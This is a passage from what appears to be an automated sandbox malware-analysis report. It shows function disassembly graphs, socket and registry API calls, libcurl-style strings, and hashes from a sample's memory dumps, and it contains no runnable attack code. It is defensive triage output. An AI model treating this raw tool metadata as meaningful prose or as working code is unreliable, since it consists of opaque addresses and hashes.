                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                                          • API String ID: 3677997916-615551945
                                                          • Opcode ID: a71a328388c7b808e46c1c8199aa3dcbf960d7b742ec827a70f78fcc1cfe9701
                                                          • Instruction ID: 260c83871467cab2c75a7a69b357ec8979e2dfd10955e0b37549782d0785b92b
                                                          • Opcode Fuzzy Hash: a71a328388c7b808e46c1c8199aa3dcbf960d7b742ec827a70f78fcc1cfe9701
                                                          • Instruction Fuzzy Hash: 4E32D8F1904201ABEF11AB26AC42A1B7A94AF45318F08483EFD0996363F739ED15C75B
                                                          Function 00408B50 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 269networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1267 408b50-408b69 1268 408be6 1267->1268 1269 408b6b-408b74 1267->1269 1270 408be9 1268->1270 1271 408b76-408b8d 1269->1271 1272 408beb-408bf2 1269->1272 1270->1272 1273 408bf3-408bfe call 40a550 1271->1273 1274 408b8f-408ba7 call 3e6e40 1271->1274 1279 408de4-408def 1273->1279 1280 408c04-408c08 1273->1280 1281 408cd9-408d16 SleepEx getsockopt 1274->1281 1282 408bad-408baf 1274->1282 1285 408df5-408e19 call 40a150 1279->1285 1286 408e8c-408e95 1279->1286 1287 408dbd-408dc3 1280->1287 1288 408c0e-408c1d 1280->1288 1283 408d22 1281->1283 1284 408d18-408d20 1281->1284 1289 408bb5-408bb9 1282->1289 1290 408ca6-408cb0 1282->1290 1291 408d26-408d39 1283->1291 1284->1291 1326 408e88 1285->1326 1327 408e1b-408e26 1285->1327 1292 408f00-408f06 1286->1292 1293 408e97-408e9c 1286->1293 1287->1270 1295 408c35-408c48 call 40a150 1288->1295 1296 408c1f-408c30 connect 1288->1296 1289->1272 1298 408bbb-408bc2 1289->1298 1290->1281 1297 408cb2-408cb8 1290->1297 1300 408d43-408d61 call 3ed8c0 call 40a150 1291->1300 1301 408d3b-408d3d 1291->1301 1292->1272 1302 408e9e-408eb6 call 3e2a00 1293->1302 1303 408edf-408eef call 3d78b0 1293->1303 1328 408c4d-408c4f 1295->1328 1296->1295 1305 408ddc-408dde 1297->1305 1306 408cbe-408cd4 call 40b180 1297->1306 1298->1272 1307 408bc4-408bcc 1298->1307 1332 408d66-408d74 1300->1332 1301->1300 1301->1305 1302->1303 1325 408eb8-408edd call 3e3410 * 2 1302->1325 1323 408ef2-408efc 1303->1323 1305->1270 1305->1279 1306->1279 1313 408bd4-408bda 1307->1313 1314 408bce-408bd2 1307->1314 1313->1272 1315 408bdc-408be1 1313->1315 1314->1272 1314->1313 1322 408dac-408db8 call 4150a0 1315->1322 1322->1272 1323->1292 1325->1323 1326->1286 1334 408e28-408e2c 1327->1334 1335 408e2e-408e85 call 3ed090 call 414fd0 1327->1335 1329 408c51-408c58 1328->1329 1330 408c8e-408c93 1328->1330 1329->1330 1336 408c5a-408c62 1329->1336 1339 408dc8-408dd9 call 40b100 1330->1339 1340 408c99-408c9f 1330->1340 1332->1272 1341 408d7a-408d81 1332->1341 1334->1326 1334->1335 1335->1326 1343 408c64-408c68 1336->1343 1344 408c6a-408c70 1336->1344 1339->1305 1340->1290 1341->1272 1347 408d87-408d8f 1341->1347 1343->1330 1343->1344 1344->1330 1349 408c72-408c8b call 4150a0 1344->1349 1351 408d91-408d95 1347->1351 1352 408d9b-408da1 1347->1352 1349->1330 1351->1272 1351->1352 1352->1272 1357 408da7 1352->1357 1357->1322
                                                          APIs
                                                          • connect.WS2_32(?,?,00000001), ref: 00408C30
                                                          • SleepEx.KERNELBASE(00000000,00000000), ref: 00408CF3
                                                          • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00408D0F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: Sleepconnectgetsockopt
                                                          • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                          • API String ID: 1669343778-879669977
                                                          • Opcode ID: b9b0d92aecc42218864815dbca828e4fe9110c7138b015e0454d33799225d9c3
                                                          • Instruction ID: c68c18307dc37c9bfbbba0e74596b06502016c26a432f1d287dd3e01ac1cf196
                                                          • Opcode Fuzzy Hash: b9b0d92aecc42218864815dbca828e4fe9110c7138b015e0454d33799225d9c3
                                                          • Instruction Fuzzy Hash: 53B19F70604306AFE710CF24CA85BA777E0AF55318F04863EF899AA3D2DB78E855C765
                                                          Function 003D2F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1453 3d2f17-3d2f8c call 8598f0 call 859ce0 1458 3d31c9-3d31cd 1453->1458 1459 3d2f91-3d2ff4 call 3d1619 RegOpenKeyExA 1458->1459 1460 3d31d3-3d31d6 1458->1460 1463 3d2ffa-3d300b 1459->1463 1464 3d31c5 1459->1464 1465 3d315c-3d31ac RegEnumKeyExA 1463->1465 1464->1458 1466 3d3010-3d3083 call 3d1619 RegOpenKeyExA 1465->1466 1467 3d31b2-3d31c2 1465->1467 1471 3d314e-3d3152 1466->1471 1472 3d3089-3d30d4 RegQueryValueExA 1466->1472 1467->1464 1471->1465 1473 3d313b-3d314b RegCloseKey 1472->1473 1474 3d30d6-3d3137 call 859bc0 call 859c50 call 859ce0 call 859af0 call 859ce0 call 858050 1472->1474 1473->1471 1474->1473
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: EnumOpen
                                                          • String ID: d
                                                          • API String ID: 3231578192-2564639436
                                                          • Opcode ID: a7848cb3d0563e602b4829b4b6588f37371665f359999986e6052cfd8485a635
                                                          • Instruction ID: 94951d0ebb54ae798d2ab4c5f2298f1cd0485e8614887d92d88d26f522a46d28
                                                          • Opcode Fuzzy Hash: a7848cb3d0563e602b4829b4b6588f37371665f359999986e6052cfd8485a635
                                                          • Instruction Fuzzy Hash: 3B7183B490431A9FDB50DF69D98479EBBF0BF84308F108869E89897351D7749A88CF92
                                                          Function 003D76A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1487 3d76a0-3d76be 1488 3d76e6-3d76f2 send 1487->1488 1489 3d76c0-3d76c7 1487->1489 1491 3d775e-3d7762 1488->1491 1492 3d76f4-3d7709 call 3d72a0 1488->1492 1489->1488 1490 3d76c9-3d76d1 1489->1490 1493 3d770b-3d7759 call 3d72a0 call 3dcb20 call 758c50 1490->1493 1494 3d76d3-3d76e4 1490->1494 1492->1491 1493->1491 1494->1492
                                                          APIs
                                                          • send.WS2_32(multi.c,?,?,?,N==,00000000,?,?,003E07BF), ref: 003D76EB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: send
                                                          • String ID: LIMIT %s:%d %s reached memlimit$N==$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                          • API String ID: 2809346765-3656297102
                                                          • Opcode ID: 96be71b4a4dbfdc22a156f61794712b33eaeb6834e8134f4a605c9720a6dcfc7
                                                          • Instruction ID: 439f5d45f790696b103db0e7a99ce4f5d4b0650e2a573574d43f7f8492c388c0
                                                          • Opcode Fuzzy Hash: 96be71b4a4dbfdc22a156f61794712b33eaeb6834e8134f4a605c9720a6dcfc7
                                                          • Instruction Fuzzy Hash: 82117AB3A293157BE521D704BC86D377BACDBC2B6CF46091AB80417392F261DD0082F2
                                                          Function 00409290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1606 409290-4092ed call 3d76a0 1609 4093c3-4093ce 1606->1609 1610 4092f3-4092fb 1606->1610 1617 4093d0-4093e1 1609->1617 1618 4093e5-409427 call 3ed090 call 414f40 1609->1618 1611 409301-409333 call 3ed8c0 call 3ed9a0 1610->1611 1612 4093aa-4093af 1610->1612 1630 409335-409364 WSAIoctl 1611->1630 1631 4093a7 1611->1631 1615 4093b5-4093bc 1612->1615 1616 409456-409470 1612->1616 1620 409429-409431 1615->1620 1621 4093be 1615->1621 1617->1615 1622 4093e3 1617->1622 1618->1616 1618->1620 1625 409433-409437 1620->1625 1626 409439-40943f 1620->1626 1621->1616 1622->1616 1625->1616 1625->1626 1626->1616 1629 409441-409453 call 4150a0 1626->1629 1629->1616 1634 409366-40936f 1630->1634 1635 40939b-4093a4 1630->1635 1631->1612 1634->1635 1638 409371-409390 setsockopt 1634->1638 1635->1631 1638->1635 1639 409392-409395 1638->1639 1639->1635
                                                          APIs
                                                          • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0040935D
                                                          • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00409389
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: Ioctlsetsockopt
                                                          • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                          • API String ID: 1903391676-2691795271
                                                          • Opcode ID: 4754b1dcc1b60ac0c872edc66c2de605ce9642f4a83b5e9c0ee698d457e1a42c
                                                          • Instruction ID: 37359bec1750b6f9a8400ac471887d5eff2861ae96126e1bf9dbc39880943a0e
                                                          • Opcode Fuzzy Hash: 4754b1dcc1b60ac0c872edc66c2de605ce9642f4a83b5e9c0ee698d457e1a42c
                                                          • Instruction Fuzzy Hash: AA51CF70604305ABD711DF25C881BAAB7A5FF88314F14852AFD48AB3D2E734ED91CB95
                                                          Function 003D7770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1640 3d7770-3d778e 1641 3d77b6-3d77c2 recv 1640->1641 1642 3d7790-3d7797 1640->1642 1644 3d782e-3d7832 1641->1644 1645 3d77c4-3d77d9 call 3d72a0 1641->1645 1642->1641 1643 3d7799-3d77a1 1642->1643 1647 3d77db-3d7829 call 3d72a0 call 3dcb20 call 758c50 1643->1647 1648 3d77a3-3d77b4 1643->1648 1645->1644 1647->1644 1648->1645
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: recv
                                                          • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                          • API String ID: 1507349165-640788491
                                                          • Opcode ID: 22d65b7f1a3e7fa1925ac50335d21af7e080c1ce7605c52aa5dac51f19891e12
                                                          • Instruction ID: 08c6b06494101d6462637485cc84d0537ae4ae40d65bc65649396ad0c5915404
                                                          • Opcode Fuzzy Hash: 22d65b7f1a3e7fa1925ac50335d21af7e080c1ce7605c52aa5dac51f19891e12
                                                          • Instruction Fuzzy Hash: 4B1150B7A163457FE1219B54BC4AE37779CDBC2B6CF46091DF80463392E6619D0081F2
                                                          Function 003D75E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1659 3d75e0-3d75ed 1660 3d75ef-3d75f6 1659->1660 1661 3d7607-3d7629 socket 1659->1661 1660->1661 1662 3d75f8-3d75ff 1660->1662 1663 3d763f-3d7642 1661->1663 1664 3d762b-3d763c call 3d72a0 1661->1664 1665 3d7601-3d7602 1662->1665 1666 3d7643-3d7699 call 3d72a0 call 3dcb20 call 758c50 1662->1666 1664->1663 1665->1661
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: socket
                                                          • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                          • API String ID: 98920635-842387772
                                                          • Opcode ID: cec241dc33d0e9c7b35196f2982c375fdb8aa3b7956934f2399ac58682c609f2
                                                          • Instruction ID: 6b8247a46a2047df699054cc2836d8d1d53d71d47e8a489a026f4530560a3670
                                                          • Opcode Fuzzy Hash: cec241dc33d0e9c7b35196f2982c375fdb8aa3b7956934f2399ac58682c609f2
                                                          • Instruction Fuzzy Hash: AE114C73A152527BDA125B79BC16F8B3B98DFC2729F460925F810963E2F311C954C2E1
                                                          Function 0040A150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1768 40a150-40a159 1769 40a250 1768->1769 1770 40a15f-40a17b 1768->1770 1771 40a181-40a1ce getsockname 1770->1771 1772 40a249-40a24f 1770->1772 1773 40a1d0-40a1f5 call 3ed090 1771->1773 1774 40a1f7-40a214 call 40ef30 1771->1774 1772->1769 1781 40a240-40a246 call 414f40 1773->1781 1774->1772 1778 40a216-40a23b call 3ed090 1774->1778 1778->1781 1781->1772
                                                          APIs
                                                          • getsockname.WS2_32(?,?,00000080), ref: 0040A1C6
                                                          Strings
                                                          • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0040A23B
                                                          • getsockname() failed with errno %d: %s, xrefs: 0040A1F0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: getsockname
                                                          • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                          • API String ID: 3358416759-2605427207
                                                          • Opcode ID: 26132af829b0007d420b74cc1582ca8f99acc0ad5ef878fd89b8618bcd320f16
                                                          • Instruction ID: a95ed266b88f6056a4507277b86565eba10d1d24400084d797519de61472db80
                                                          • Opcode Fuzzy Hash: 26132af829b0007d420b74cc1582ca8f99acc0ad5ef878fd89b8618bcd320f16
                                                          • Instruction Fuzzy Hash: D921DB71808380B6E6269719DC46FE773ACEF81328F040665F99863191FE326D9687E6
                                                          Function 003ED5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1788 3ed5e0-3ed5ee 1789 3ed652-3ed662 WSAStartup 1788->1789 1790 3ed5f0-3ed604 call 3ed690 1788->1790 1791 3ed664-3ed66f 1789->1791 1792 3ed670-3ed676 1789->1792 1796 3ed61b-3ed651 call 3f7620 1790->1796 1797 3ed606-3ed614 1790->1797 1792->1790 1794 3ed67c-3ed68d 1792->1794 1797->1796 1802 3ed616 1797->1802 1802->1796
                                                          APIs
                                                          • WSAStartup.WS2_32(00000202), ref: 003ED65A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmpDownload File
